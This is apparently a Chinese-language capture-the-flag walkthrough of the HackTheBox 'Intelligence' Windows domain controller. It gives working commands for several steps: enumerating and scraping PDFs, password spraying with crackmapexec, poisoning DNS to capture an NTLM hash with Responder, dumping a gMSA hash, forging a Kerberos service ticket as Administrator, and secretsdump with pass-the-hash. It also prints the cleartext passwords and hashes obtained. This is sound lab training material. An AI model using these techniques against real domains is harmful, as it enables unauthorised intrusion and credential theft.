Intelligence - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/357

• 10.10.10.248

端口扫描

常规域环境,intelligence.htb：

$ nmap -sC -sV -Pn 10.10.10.248

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 14:33 CST
Nmap scan report for 10.10.10.248
Host is up (0.075s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-05 13:34:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-05T13:36:02+00:00; +7h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-05T13:35:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.56 seconds

80

web上有一些文档可以下载，命名格式很规律：

PDFs

根据pdf命名格式发现其他文件：

基于这些pdf提取用户名：

pdf文件很多文本，提取出来过滤关键字可以得到一个初始密码：

NewIntelligenceCorpUser9876

kerbrute

keerbrute确认这些用户名都是有效的，不需要格式变形：

usernames

Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee

scan.py

#!/usr/bin/python3

import requests
import os

url = 'http://intelligence.htb/documents/'

for i in range(2020,2022):
	for j in range(1,13):
		for k in range(1,31):
			date = f'{i}-{j:02}-{k:02}-upload.pdf'
			r = requests.get(url+date)
			#print (r.text)
			if (r.status_code == 200):
				print (date)
				#text = r.text
				os.system('mkdir pdf')
				os.system(f'wget {url}{date} -O pdf/{date}')

extract_text.py

#!/usr/bin/python3

from pdfminer.high_level import extract_text

files = ['2020-01-01-upload.pdf', '2020-01-02-upload.pdf', '2020-01-04-upload.pdf', '2020-01-10-upload.pdf', '2020-01-20-upload.pdf', '2020-01-22-upload.pdf', '2020-01-23-upload.pdf', '2020-01-25-upload.pdf', '2020-01-30-upload.pdf', '2020-02-11-upload.pdf', '2020-02-17-upload.pdf', '2020-02-23-upload.pdf', '2020-02-24-upload.pdf', '2020-02-28-upload.pdf', '2020-03-04-upload.pdf', '2020-03-05-upload.pdf', '2020-03-12-upload.pdf', '2020-03-13-upload.pdf', '2020-03-17-upload.pdf', '2020-03-21-upload.pdf', '2020-04-02-upload.pdf', '2020-04-04-upload.pdf', '2020-04-15-upload.pdf', '2020-04-23-upload.pdf', '2020-05-01-upload.pdf', '2020-05-03-upload.pdf', '2020-05-07-upload.pdf', '2020-05-11-upload.pdf', '2020-05-17-upload.pdf', '2020-05-20-upload.pdf', '2020-05-21-upload.pdf', '2020-05-24-upload.pdf', '2020-05-29-upload.pdf', '2020-06-02-upload.pdf', '2020-06-03-upload.pdf', '2020-06-04-upload.pdf', '2020-06-07-upload.pdf', '2020-06-08-upload.pdf', '2020-06-12-upload.pdf', '2020-06-14-upload.pdf', '2020-06-15-upload.pdf', '2020-06-21-upload.pdf', '2020-06-22-upload.pdf', '2020-06-25-upload.pdf', '2020-06-26-upload.pdf', '2020-06-28-upload.pdf', '2020-06-30-upload.pdf', '2020-07-02-upload.pdf', '2020-07-06-upload.pdf', '2020-07-08-upload.pdf', '2020-07-20-upload.pdf', '2020-07-24-upload.pdf', '2020-08-01-upload.pdf', '2020-08-03-upload.pdf', '2020-08-09-upload.pdf', '2020-08-19-upload.pdf', '2020-08-20-upload.pdf', '2020-09-02-upload.pdf', '2020-09-04-upload.pdf', '2020-09-05-upload.pdf', '2020-09-06-upload.pdf', '2020-09-11-upload.pdf', '2020-09-13-upload.pdf', '2020-09-16-upload.pdf', '2020-09-22-upload.pdf', '2020-09-27-upload.pdf', '2020-09-29-upload.pdf', '2020-09-30-upload.pdf', '2020-10-05-upload.pdf', '2020-10-19-upload.pdf', '2020-11-01-upload.pdf', '2020-11-03-upload.pdf', '2020-11-06-upload.pdf', '2020-11-10-upload.pdf', '2020-11-11-upload.pdf', '2020-11-13-upload.pdf', '2020-11-24-upload.pdf', '2020-11-30-upload.pdf']
#keywords = ['user','username','pass','password']
keywords = 'user'

for i in files:
	text = extract_text('pdf/'+i)
	if(keywords in text):
		print (i)
		print (text)

SMB

crackmapexec

根据得到的用户名和密码得到一组有效账号：

crackmapexec smb intelligence.htb -u user.txt -p NewIntelligenceCorpUser9876

intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

smb share

枚举smb share：

user flag

smb share中存在Users，其中可以在Tiffany.Molina用户目录桌面得到user.txt:

信息

IT里有个powershell文件，查看内容发现是有一个定时任务在运行，每5分钟去检查web*状态：

那么如果我们可以添加一个dns记录指向我们自己的机器，就可以利用responder得到Ted.Graves用户hash

Ted.Graves

dnstool

使用这里面的dnstool，添加一条dns记录：

• https://github.com/dirkjanm/krbrelayx.git

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.11 10.10.10.248

然后等待定时任务执行，得到Ted.Graves用户hash：

hash 破解出来Ted.Graves用户密码：

Mr.Teddy         (Ted.Graves)

responder

sudo Python ~/Tools/Responder/Responder.py -I utun2 -i 10.10.14.11 -A -v

[HTTP] Sending NTLM authentication request to 10.10.10.248
[HTTP] GET request from: 10.10.10.248     URL: /
[HTTP] Host             : weboops
[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:1122334455667788:EDCC3A25B7BF1CD7CD0DA243D3C47BB3:0101000000000000DA87A000AC71D7014E8553B060A5D4E9000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000000092A515C8ADAC1F751188FB938EF6F4FBDDB167339C23CBB4BACACA397E43350A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

LDAP

利用已有的账号密码继续枚举ldap，得到gMSA密码：

• https://github.com/micahvandeusen/gMSADumper

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy  -d intelligence.htb

svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

白银票据

现在有一个svc账号的hash，可以尝试白银票据,但直接尝试得到一个错误，时钟偏移太大：

python3 ~/Tools/impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator

ntpupdate

很常见的问题，同步一下时间就可以：

sudo apt-get install ntpdate
sudo ntpdate 10.10.10.248

secretdump

之后就可以使用生成的票据进行各种操作，例如secretdump：

root flag

之后就可以PTH得到system shell，读取root.txt:

参考资料

• https://github.com/dirkjanm/krbrelayx
• https://github.com/micahvandeusen/gMSADumper
• No Shells Required - a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA
  http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
• HTB Intelligence [Discussion] | RaidForums
  https://raidforums.com/Thread-Tutorial-HTB-Intelligence-Discussion
• HTB Intelligence User and Root (free) | RaidForums
  https://raidforums.com/Thread-Tutorial-HTB-Intelligence-User-and-Root-free